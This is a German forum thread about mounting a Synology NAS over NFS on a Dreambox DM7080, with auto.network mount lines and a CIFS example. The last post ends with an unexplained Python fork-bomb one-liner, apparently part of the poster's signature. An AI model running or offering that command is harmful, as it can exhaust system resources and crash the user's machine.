NFS Mount

    • Hallo

      Ich habe auf meiner DM7080 das aktuelle Newnigma Image installiert, doch es schaffe es nicht über NFS auf mein Synology NAS zu zugreifen. Auf meiner DM8000 und DM7020 habe ich auch das Newnigma Image installiert und da klappt es über die auto.network.

      Quellcode

      1. Movie -fstype=nfs,rw,soft,tcp,nolock,rsize=16384,wsize=16384 nas.fritz.box:/volume2/video


      Doch mit der DM7080 klappt das nicht. Geht da die auto.network gar nicht mehr oder muss noch etwas installiert werden?

      Vielen Dank

      Gruss
    • Probier mal so:

      Quellcode

      1. Movie -fstype=nfs,rw,soft,tcp,nolock,rsize=16384,wsize=16384,vers=3 nas.fritz.box:/volume2/video



      PS: Stimmt natürlich, was gutemine schreibt. Wenn du den newnigma2-filebrowser ( nicht verwechseln mit dem enigma2-filebrowser) installierst, bekommst du auch im Newnigma2-Menü den "Edit auto.network", der macht das "vers=3" automatisch in deine Links.
      Nochwas, hast du eine HDD in der 7080? Ich hatte Probleme, von den OE2.0 Boxen auf die HDD der 7080 per NFS zuzugreifen. Aber geht jetzt, lies mal hier, wenn du das auch brauchst.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Griffel ()

    • schetin schrieb:

      pppppppllo


      Gesendet mit der iWatch

      suxus schrieb:

      Hallo

      Ich habe auf meiner DM7080 das aktuelle Newnigma Image installiert, doch es schaffe es nicht über NFS auf mein Synology NAS zu zugreifen. Auf meiner DM8000 und DM7020 habe ich auch das Newnigma Image installiert und da klappt es über die auto.network.

      Quellcode

      1. Movie -fstype=nfs,rw,soft,tcp,nolock,rsize=16384,wsize=16384 nas.fritz.box:/volume2/video


      Doch mit der DM7080 klappt das nicht. Geht da die auto.network gar nicht mehr oder muss noch etwas installiert werden?

      Vielen Dank

      Gruss

      So wie ich das sehe willst du einen Fritzbox share einbinden egal ob nun netzwerkbrowser oder filebrowser verwendest bei fritzbox brauchste als parameter sec=ntlmv2 bei cifs und nicht nfs
      So sieht das hier aus

      Quellcode

      1. Fritz -fstype=cifs,rw,soft,rsize=8192,wsize=8192,user=xxxxxx,pass=xxxxxx,sec=ntlmv2 ://fritz.box/Fritz3390
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !